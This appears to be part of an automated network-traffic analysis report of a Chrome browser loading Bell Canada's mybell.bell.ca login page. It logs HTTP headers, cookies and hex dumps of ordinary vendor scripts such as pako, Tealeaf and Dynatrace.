                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                      Cookie: BSCC=LoginSplashReturnURL=%2fLogin%3flanguage%3den; 8D711C5DA4B3704F0A5FE8ED0DB141222DFC87ED6AFE3A6E5F0F7DA8B5953F07F9198C1C7587982AE5FDA2B721188A3A=false; FPID=074d78d6-7e50-4974-a9af-c4727a62784e; FPID_2=074d78d6-7e50-4974-a9af-c4727a62784e; SessionCk=e60da217-072c-41c7-969e-7adbf82ba8be; InActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; ConsistentActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; OmniturePageName=Login:; __eccomp=; dtCookie=v_4_srv_8_sn_20124DC10D36CDE3D1C555C55D40CA36_perc_100000_ol_0_mul_1_app-3A429b1eac4514c5ce_1_rcs-3Acss_0; CAD_Bell_ca_SS=967776428.47873.0000; Qjja3xkGs7=3789514188.64288.0000; TLTSID=759A09CF47C23CE7804C25098E01FFA8; TLTUID=26A0122B5E2EB3DDD5D9EB8E4F02EA98; TLP025e8c23=028702b9c92edae6af33052f2cad8391df3643e23d85a115a62dcd733137452f4305eb2ab8d3f82b8b13ae85a95e4a91df25ba1c299bcfdedb4de1548e72df9a4d727dc04ff7a4434f043a9549e2ae990e27c8fffcf8c51f6f45ef28d16623df71e944530154bdbbc943f1778729d75c23d5090b564224b9da5206df5702a68a73781d1fd1ececbd44594c5dd8c5b5254f6f1bde1 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:58 UTC1760INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:11:58 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                      Content-Length: 987
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Expires: 0
                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                                                                                                      Set-Cookie: lanAkamaPro=A5IztOKSAQAAfK0hC-Sd8xQWQaTBAexuZE_ULjNr2v-63nNi-QEd9JDirAQvAa3--k2ucgHcwH8AAEB3AAAAAA|1|0|5936127134d4a7470b6c18b8f02213c4d723e799; Path=/; Max-Age=1577847600; Domain=bell.ca; Secure
                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                      Bell-Geo: 1
                                                                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                                                      Set-Cookie: TLP025e8c23=028702b9c92edae6af33052f2cad8391df3643e23d85a115a62dcd733137452f4305eb2ab8d3f82b8b13ae85a95e4a91df25ba1c299bcfdedb4de1548e72df9a4d727dc04ff7a4434f043a9549e2ae990e27c8fffcf8c51f6f45ef28d16623df71e944530154bdbbc943f1778729d75c23d5090b564224b9da5206df5702a68a73781d1fd1ececbd44594c5dd8c5b5254f6f1bde1d0a0592f816ed03e81d2a7361fff6316b97ddde987648e57932628c05ca645ec1dd7f856ec66444e629d0622a68b7e2c134f284f196ea3544cf3b7c82207a54921a6555f20de00c22b2c76ebcdc53eaee7e5f6b642a0290d9cec5131cd8fb109ee0df2b3f4778939a7789ac78056fb9410029bd6003a59e231a02b1e37dbc7850fd5bd1f084ade389122c5bd439ff5038520f0b6ac30f03e31c23ca7289d6d59979f12f660f3dbeb3c0f974d1ad06761c0eda4704077fb3cf009e2239d228a2b96806fe5c793a3730769749ad8989123b; Path=/; Domain=.bell.ca; Secure; HttpOnly;
                                                                                                                                                                                                                                                                                                                                      Set-Cookie: TLP02ce4a58=028702b9c93a131f183946e5fba2da8acf4264474085a115a62dcd733137452f4305eb2ab84ad0304b853df666ee8067949b77e11784af563bbdb36d1d3f79fb6950541b57; path=/; domain=bell.ca; HttpOnly; Secure
                                                                                                                                                                                                                                                                                                                                      Set-Cookie: TLP409c8162028=08e8c5f15aab20006c35c0ea77dee893e66bc14534cbe58583e846fd6c3c0897c18efdb3510708dd08973e071711300002fe39cb927663c8f1b815a23a7dea6e52c94a29df57fe2c39281a962802db4638eaf7f0c303c4afa5ba830a9e009b6f; Path=/
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:58 UTC987INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 64 3d 64 6f 63 75 6d 65 6e 74 2c 77 3d 77 69 6e 64 6f 77 2c 75 3d 22 2f 73 74 61 74 69 63 2f 62 65 6c 6c 5f 63 6f 6d 6d 6f 6e 2e 6a 73 3f 73 65 65 64 3d 41 49 42 51 71 65 4b 53 41 51 41 41 31 74 58 35 38 61 75 42 38 74 4b 31 70 6f 47 35 76 37 53 66 37 46 51 7a 35 63 4d 76 67 64 49 70 46 39 63 6c 44 57 6a 54 75 51 78 5f 59 6a 79 41 26 6c 6d 53 65 4c 38 71 41 72 77 2d 2d 7a 3d 71 22 2c 76 3d 22 66 78 64 77 4d 47 67 52 74 22 2c 69 3d 22 65 63 34 36 63 32 66 35 39 38 63 33 39 32 63 66 64 33 64 36 31 34 62 61 37 32 36 31 33 32 37 33 22 3b 76 61 72 20 73 3d 64 2e 63 75 72 72 65 6e 74 53 63 72 69 70 74 3b 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 76 2c 66 75 6e 63 74 69 6f 6e 20 66 28 65 29 7b 65 2e 73
                                                                                                                                                                                                                                                                                                                                      Data Ascii: (function(a){var d=document,w=window,u="/static/bell_common.js?seed=AIBQqeKSAQAA1tX58auB8tK1poG5v7Sf7FQz5cMvgdIpF9clDWjTuQx_YjyA&lmSeL8qArw--z=q",v="fxdwMGgRt",i="ec46c2f598c392cfd3d614ba72613273";var s=d.currentScript;addEventListener(v,function f(e){e.s


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                      49192.168.2.949782206.47.98.2074433100C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:58 UTC2338OUTGET /styles/tealeaf/tltWorker.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Host: mybell.bell.ca
                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                      Cookie: BSCC=LoginSplashReturnURL=%2fLogin%3flanguage%3den; 8D711C5DA4B3704F0A5FE8ED0DB141222DFC87ED6AFE3A6E5F0F7DA8B5953F07F9198C1C7587982AE5FDA2B721188A3A=false; FPID=074d78d6-7e50-4974-a9af-c4727a62784e; FPID_2=074d78d6-7e50-4974-a9af-c4727a62784e; SessionCk=e60da217-072c-41c7-969e-7adbf82ba8be; InActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; ConsistentActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; OmniturePageName=Login:; __eccomp=; dtCookie=v_4_srv_8_sn_20124DC10D36CDE3D1C555C55D40CA36_perc_100000_ol_0_mul_1_app-3A429b1eac4514c5ce_1_rcs-3Acss_0; CAD_Bell_ca_SS=967776428.47873.0000; Qjja3xkGs7=3789514188.64288.0000; TLTSID=759A09CF47C23CE7804C25098E01FFA8; TLTUID=26A0122B5E2EB3DDD5D9EB8E4F02EA98; TLP025e8c23=028702b9c92edae6af33052f2cad8391df3643e23d85a115a62dcd733137452f4305eb2ab8d3f82b8b13ae85a95e4a91df25ba1c299bcfdedb4de1548e72df9a4d727dc04ff7a4434f043a9549e2ae990e27c8fffcf8c51f6f45ef28d16623df71e944530154bdbbc943f1778729d75c23d5090b564224b9da5206df5702a68a73781d1fd1ececbd44594c5dd8c5b5254f6f1bde1 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:58 UTC2441INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=86400
                                                                                                                                                                                                                                                                                                                                      Content-Type: application/x-javascript
                                                                                                                                                                                                                                                                                                                                      Expires: Fri, 01 Nov 2024 13:11:58 GMT
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Sun, 17 Jul 2022 16:18:19 GMT
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      ETag: "1D899F8D3B19780"
                                                                                                                                                                                                                                                                                                                                      X-Generated-By: Q-BC036
                                                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                                                      X-XSS-Protection: 1
                                                                                                                                                                                                                                                                                                                                      Content-Security-Policy: frame-ancestors bell.ca *.bell.ca *.bellmts.ca *.virginmobile.ca *.virginplus.ca *.vm.ca *.vmobile.ca *.vmcanada.com *.thesource.ca *.luckymobile.ca *.decibelinsight.net *.decibel.com; script-src https://*.bazaarvoice.com https://*.luckymobile.ca https://www.googletagmanager.com https://sc-static.net https://assets.adobedtm.com https://*.google-analytics.com https://*.postescanada-canadapost.ca https://*.nuance.com https://*.inq.com https://connect.facebook.net https://static.ads-twitter.com https://*.twitter.com https://ssl.geoplugin.net https://s.pinimg.com https://*.google.com https://*.gstatic.com https://*.vmobile.ca https://*.googleadservices.com https://*.stackadapt.com https://*.doubleclick.net https://*.virginplus.ca https://*.bell.ca https://*.tiktok.com https://*.know-where.com https://*.korem.com https://*.googleapis.com https://*.coveo.com https://siteimproveanalytics.com https://*.licdn.com https://mybell-qc.akamaized.net https://mybell-on.akamaized.net https://vldbellsu [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                      Server-Timing: dtSInfo;desc="0", dtRpid;desc="-518099391"
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:11:58 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Length: 30953
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Set-Cookie: TLP409c8162028=08e8c5f15aab2000df50032fc73aefd506bfbc84f71af20333d6a74ef7c722e4be136834733e5e5d0899502d91113000fb16e62baf87223df1b815a23a7dea6e52c94a29df57fe2c39281a962802db4638eaf7f0c303c4afa5ba830a9e009b6f; Path=/
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:58 UTC13943INData Raw: 2f 2a 21 20 70 61 6b 6f 20 64 65 66 6c 61 74 65 20 31 2e 30 2e 31 31 20 77 69 74 68 20 44 6f 6a 6f 2f 52 65 61 63 74 4a 53 20 66 69 78 2e 20 54 68 65 20 66 69 78 20 63 6f 6e 73 69 73 74 73 20 6f 66 20 74 68 65 20 66 6f 72 63 69 6e 67 20 6f 66 20 74 68 65 20 61 73 73 69 67 6e 6d 65 6e 74 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 6f 62 6a 65 63 74 20 66 72 6f 6d 20 74 68 65 20 63 61 6c 6c 20 74 6f 20 27 74 28 29 27 20 74 6f 20 27 77 69 6e 64 6f 77 2e 70 61 6b 6f 27 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 74 29 7b 73 65 6c 66 2e 70 61 6b 6f 3d 74 28 29 7d 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 20 69 28 73 2c 68 2c 6c 29 7b 66 75 6e 63 74 69 6f 6e 20 6f 28 65 2c 74 29 7b 69 66 28 21 68 5b 65 5d 29 7b 69 66
                                                                                                                                                                                                                                                                                                                                      Data Ascii: /*! pako deflate 1.0.11 with Dojo/ReactJS fix. The fix consists of the forcing of the assignment of the returned object from the call to 't()' to 'window.pako' */!function(t){self.pako=t()}(function(){return function i(s,h,l){function o(e,t){if(!h[e]){if
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:58 UTC16384INData Raw: 2e 68 63 72 63 26 26 6e 2e 70 65 6e 64 69 6e 67 3e 72 26 26 28 74 2e 61 64 6c 65 72 3d 63 28 74 2e 61 64 6c 65 72 2c 6e 2e 70 65 6e 64 69 6e 67 5f 62 75 66 2c 6e 2e 70 65 6e 64 69 6e 67 2d 72 2c 72 29 29 2c 71 28 74 29 2c 72 3d 6e 2e 70 65 6e 64 69 6e 67 2c 6e 2e 70 65 6e 64 69 6e 67 3d 3d 3d 6e 2e 70 65 6e 64 69 6e 67 5f 62 75 66 5f 73 69 7a 65 29 29 7b 69 3d 31 3b 62 72 65 61 6b 7d 4c 28 6e 2c 69 3d 6e 2e 67 7a 69 6e 64 65 78 3c 6e 2e 67 7a 68 65 61 64 2e 6e 61 6d 65 2e 6c 65 6e 67 74 68 3f 32 35 35 26 6e 2e 67 7a 68 65 61 64 2e 6e 61 6d 65 2e 63 68 61 72 43 6f 64 65 41 74 28 6e 2e 67 7a 69 6e 64 65 78 2b 2b 29 3a 30 29 7d 77 68 69 6c 65 28 30 21 3d 3d 69 29 3b 6e 2e 67 7a 68 65 61 64 2e 68 63 72 63 26 26 6e 2e 70 65 6e 64 69 6e 67 3e 72 26 26 28 74 2e
                                                                                                                                                                                                                                                                                                                                      Data Ascii: .hcrc&&n.pending>r&&(t.adler=c(t.adler,n.pending_buf,n.pending-r,r)),q(t),r=n.pending,n.pending===n.pending_buf_size)){i=1;break}L(n,i=n.gzindex<n.gzhead.name.length?255&n.gzhead.name.charCodeAt(n.gzindex++):0)}while(0!==i);n.gzhead.hcrc&&n.pending>r&&(t.
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:58 UTC626INData Raw: 20 20 20 20 20 20 20 72 65 73 75 6c 74 2e 64 61 74 61 20 3d 20 4a 53 4f 4e 2e 70 61 72 73 65 28 72 65 73 70 6f 6e 73 65 44 61 74 61 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 20 63 61 74 63 68 20 28 65 31 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2f 2f 20 45 6c 73 65 20 73 65 6e 64 20 72 61 77 20 74 65 78 74 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 73 75 6c 74 2e 64 61 74 61 20 3d 20 72 65 73 70 6f 6e 73 65 44 61 74 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 6f 73 74 4d 65 73 73 61 67 65 28 72 65 73 75 6c 74 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 2e 63 61 74 63 68 28 66 75 6e 63 74 69 6f 6e 20 28 65
                                                                                                                                                                                                                                                                                                                                      Data Ascii: result.data = JSON.parse(responseData); } catch (e1) { // Else send raw text result.data = responseData; } postMessage(result); }).catch(function (e


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                      50192.168.2.949784206.47.98.2074433100C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:58 UTC2359OUTGET /ruxitagentjs_ICA7NQVfghqrux_10299241001084140.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Host: mybell.bell.ca
                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                      Cookie: BSCC=LoginSplashReturnURL=%2fLogin%3flanguage%3den; 8D711C5DA4B3704F0A5FE8ED0DB141222DFC87ED6AFE3A6E5F0F7DA8B5953F07F9198C1C7587982AE5FDA2B721188A3A=false; FPID=074d78d6-7e50-4974-a9af-c4727a62784e; FPID_2=074d78d6-7e50-4974-a9af-c4727a62784e; SessionCk=e60da217-072c-41c7-969e-7adbf82ba8be; InActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; ConsistentActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; OmniturePageName=Login:; __eccomp=; dtCookie=v_4_srv_8_sn_20124DC10D36CDE3D1C555C55D40CA36_perc_100000_ol_0_mul_1_app-3A429b1eac4514c5ce_1_rcs-3Acss_0; CAD_Bell_ca_SS=967776428.47873.0000; Qjja3xkGs7=3789514188.64288.0000; TLTSID=759A09CF47C23CE7804C25098E01FFA8; TLTUID=26A0122B5E2EB3DDD5D9EB8E4F02EA98; TLP025e8c23=028702b9c92edae6af33052f2cad8391df3643e23d85a115a62dcd733137452f4305eb2ab8d3f82b8b13ae85a95e4a91df25ba1c299bcfdedb4de1548e72df9a4d727dc04ff7a4434f043a9549e2ae990e27c8fffcf8c51f6f45ef28d16623df71e944530154bdbbc943f1778729d75c23d5090b564224b9da5206df5702a68a73781d1fd1ececbd44594c5dd8c5b5254f6f1bde1 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:58 UTC2356INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=31536000, immutable
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                                                      Expires: Fri, 31 Oct 2025 13:11:58 GMT
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Wed, 03 Mar 2010 07:01:40 GMT
                                                                                                                                                                                                                                                                                                                                      X-Generated-By: Q-BC036
                                                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                                                      X-XSS-Protection: 1
                                                                                                                                                                                                                                                                                                                                      Content-Security-Policy: frame-ancestors bell.ca *.bell.ca *.bellmts.ca *.virginmobile.ca *.virginplus.ca *.vm.ca *.vmobile.ca *.vmcanada.com *.thesource.ca *.luckymobile.ca *.decibelinsight.net *.decibel.com; script-src https://*.bazaarvoice.com https://*.luckymobile.ca https://www.googletagmanager.com https://sc-static.net https://assets.adobedtm.com https://*.google-analytics.com https://*.postescanada-canadapost.ca https://*.nuance.com https://*.inq.com https://connect.facebook.net https://static.ads-twitter.com https://*.twitter.com https://ssl.geoplugin.net https://s.pinimg.com https://*.google.com https://*.gstatic.com https://*.vmobile.ca https://*.googleadservices.com https://*.stackadapt.com https://*.doubleclick.net https://*.virginplus.ca https://*.bell.ca https://*.tiktok.com https://*.know-where.com https://*.korem.com https://*.googleapis.com https://*.coveo.com https://siteimproveanalytics.com https://*.licdn.com https://mybell-qc.akamaized.net https://mybell-on.akamaized.net https://vldbellsu [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:11:58 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Length: 341434
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Set-Cookie: TLP409c8162028=08e8c5f15aab2000b241841862cb126c325ec42da67f89c6fa5a3063993fc26fc041fae42e5908f80827395ca9113000284e3cac240268f8f1b815a23a7dea6e52c94a29df57fe2c39281a962802db4638eaf7f0c303c4afa5ba830a9e009b6f; Path=/
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:58 UTC14028INData Raw: 2f 2a 0a 20 43 6f 70 79 72 69 67 68 74 20 61 6e 64 20 6c 69 63 65 6e 73 65 73 20 73 65 65 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 64 79 6e 61 74 72 61 63 65 2e 63 6f 6d 2f 63 6f 6d 70 61 6e 79 2f 74 72 75 73 74 2d 63 65 6e 74 65 72 2f 63 75 73 74 6f 6d 65 72 73 2f 72 65 70 6f 72 74 73 2f 20 2a 2f 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 4b 61 28 29 7b 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 3d 22 22 2e 63 6f 6e 63 61 74 28 22 5f 5f 64 54 43 6f 6f 6b 69 65 22 2c 22 3d 22 29 2e 63 6f 6e 63 61 74 28 22 31 22 2c 22 3b 53 61 6d 65 53 69 74 65 3d 4c 61 78 22 29 3b 76 61 72 20 4f 61 3d 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 2e 69 6e 63 6c 75 64 65 73 28 22 5f 5f 64 54 43 6f 6f 6b 69 65 22 29 3b 64 6f 63 75 6d 65 6e 74 2e 63 6f
                                                                                                                                                                                                                                                                                                                                      Data Ascii: /* Copyright and licenses see https://www.dynatrace.com/company/trust-center/customers/reports/ */(function(){function Ka(){document.cookie="".concat("__dTCookie","=").concat("1",";SameSite=Lax");var Oa=document.cookie.includes("__dTCookie");document.co
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:58 UTC16384INData Raw: 6e 63 74 69 6f 6e 20 52 63 28 67 29 7b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 3d 74 79 70 65 6f 66 20 67 26 26 66 68 2e 70 75 73 68 28 67 29 7d 66 75 6e 63 74 69 6f 6e 20 69 64 28 29 7b 72 65 74 75 72 6e 20 66 68 7d 66 75 6e 63 74 69 6f 6e 20 41 61 28 29 7b 72 65 74 75 72 6e 20 53 66 7d 66 75 6e 63 74 69 6f 6e 20 4a 28 67 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 71 3d 5b 5d 2c 78 3d 30 3b 78 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 78 2b 2b 29 71 5b 78 5d 3d 0a 61 72 67 75 6d 65 6e 74 73 5b 78 5d 3b 69 66 28 22 6e 75 6d 62 65 72 22 21 3d 3d 74 79 70 65 6f 66 20 71 5b 30 5d 7c 7c 21 44 65 5b 71 5b 30 5d 5d 29 74 72 79 7b 72 65 74 75 72 6e 20 67 2e 61 70 70 6c 79 28 74 68 69 73 2c 71 29 7d 63 61 74 63 68
                                                                                                                                                                                                                                                                                                                                      Data Ascii: nction Rc(g){"function"===typeof g&&fh.push(g)}function id(){return fh}function Aa(){return Sf}function J(g){return function(){for(var q=[],x=0;x<arguments.length;x++)q[x]=arguments[x];if("number"!==typeof q[0]||!De[q[0]])try{return g.apply(this,q)}catch
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:58 UTC16384INData Raw: 3f 76 6f 69 64 20 30 3a 76 61 2e 67 65 74 49 74 65 6d 28 22 64 74 41 64 6b 53 65 74 74 69 6e 67 73 22 29 29 7c 7c 22 22 29 2e 6f 76 65 72 6c 6f 61 64 53 74 61 74 65 3b 69 66 28 21 28 21 50 63 7c 7c 75 65 3f 30 3a 22 63 6f 6d 70 6c 65 74 65 22 21 3d 3d 64 6f 63 75 6d 65 6e 74 2e 72 65 61 64 79 53 74 61 74 65 7c 7c 58 61 2e 70 65 72 66 6f 72 6d 61 6e 63 65 26 26 0a 58 61 2e 70 65 72 66 6f 72 6d 61 6e 63 65 2e 74 69 6d 69 6e 67 29 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 45 72 72 6f 72 20 64 75 72 69 6e 67 20 69 6e 69 74 43 6f 64 65 20 69 6e 69 74 69 61 6c 69 7a 61 74 69 6f 6e 22 29 3b 74 72 79 7b 46 66 3d 58 61 2e 6c 6f 63 61 6c 53 74 6f 72 61 67 65 7d 63 61 74 63 68 28 67 68 29 7b 7d 24 65 3d 5b 5d 3b 7a 61 28 29 3b 53 66 3d 45 63 28 29 3b 62 66 3d 5b 5d
                                                                                                                                                                                                                                                                                                                                      Data Ascii: ?void 0:va.getItem("dtAdkSettings"))||"").overloadState;if(!(!Pc||ue?0:"complete"!==document.readyState||Xa.performance&&Xa.performance.timing))throw Error("Error during initCode initialization");try{Ff=Xa.localStorage}catch(gh){}$e=[];za();Sf=Ec();bf=[]
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:58 UTC262INData Raw: 20 43 6f 6e 73 69 64 65 72 20 75 70 64 61 74 69 6e 67 20 79 6f 75 72 20 63 6f 64 65 20 73 6e 69 70 70 65 74 20 66 6f 72 20 62 65 73 74 20 63 6f 6d 70 61 74 69 62 69 6c 69 74 79 2e 22 29 7d 5d 7d 29 3b 45 28 22 44 45 42 55 47 5f 49 4e 46 4f 5f 52 45 51 55 45 53 54 45 44 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 5b 7b 74 79 70 65 3a 22 76 22 2c 73 65 76 65 72 69 74 79 3a 22 49 6e 66 6f 22 2c 74 65 78 74 3a 22 53 6e 69 70 70 65 74 20 76 65 72 73 69 6f 6e 3a 20 22 2e 63 6f 6e 63 61 74 28 61 2c 0a 22 20 3b 20 4d 6f 6e 69 74 6f 72 69 6e 67 20 63 6f 64 65 3a 22 29 2e 63 6f 6e 63 61 74 28 4c 61 28 29 29 7d 5d 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 4a 61 28 61 2c 62 29 7b 76 6f 69 64 20 30 3d 3d 3d 62 26 26 28 62 3d 5b 5d 29 3b 76 61 72 20 66 3d 42 62
                                                                                                                                                                                                                                                                                                                                      Data Ascii: Consider updating your code snippet for best compatibility.")}]});E("DEBUG_INFO_REQUESTED",function(){return[{type:"v",severity:"Info",text:"Snippet version: ".concat(a," ; Monitoring code:").concat(La())}]})}function Ja(a,b){void 0===b&&(b=[]);var f=Bb
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:58 UTC16384INData Raw: 28 6e 75 6c 6c 3d 3d 3d 66 7c 7c 76 6f 69 64 20 30 3d 3d 3d 66 3f 30 3a 66 2e 69 49 4f 29 3f 66 2e 69 49 4f 3a 6e 75 6c 6c 3b 72 65 74 75 72 6e 21 28 6e 75 6c 6c 3d 3d 3d 66 7c 7c 76 6f 69 64 20 30 3d 3d 3d 66 7c 7c 21 66 28 61 2c 62 29 29 7d 66 75 6e 63 74 69 6f 6e 20 6a 61 28 29 7b 7d 66 75 6e 63 74 69 6f 6e 20 49 61 28 61 29 7b 72 65 74 75 72 6e 28 4a 61 28 61 2c 39 29 7c 7c 45 61 28 61 29 29 26 26 28 22 73 74 72 69 6e 67 22 3d 3d 3d 74 79 70 65 6f 66 20 61 2e 74 65 78 74 43 6f 6e 74 65 6e 74 7c 7c 22 73 74 72 69 6e 67 22 3d 3d 3d 74 79 70 65 6f 66 20 61 2e 69 6e 6e 65 72 54 65 78 74 29 7d 66 75 6e 63 74 69 6f 6e 20 45 61 28 61 29 7b 72 65 74 75 72 6e 20 61 26 26 61 2e 6e 6f 64 65 54 79 70 65 26 26 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 7d 66 75 6e
                                                                                                                                                                                                                                                                                                                                      Data Ascii: (null===f||void 0===f?0:f.iIO)?f.iIO:null;return!(null===f||void 0===f||!f(a,b))}function ja(){}function Ia(a){return(Ja(a,9)||Ea(a))&&("string"===typeof a.textContent||"string"===typeof a.innerText)}function Ea(a){return a&&a.nodeType&&1===a.nodeType}fun
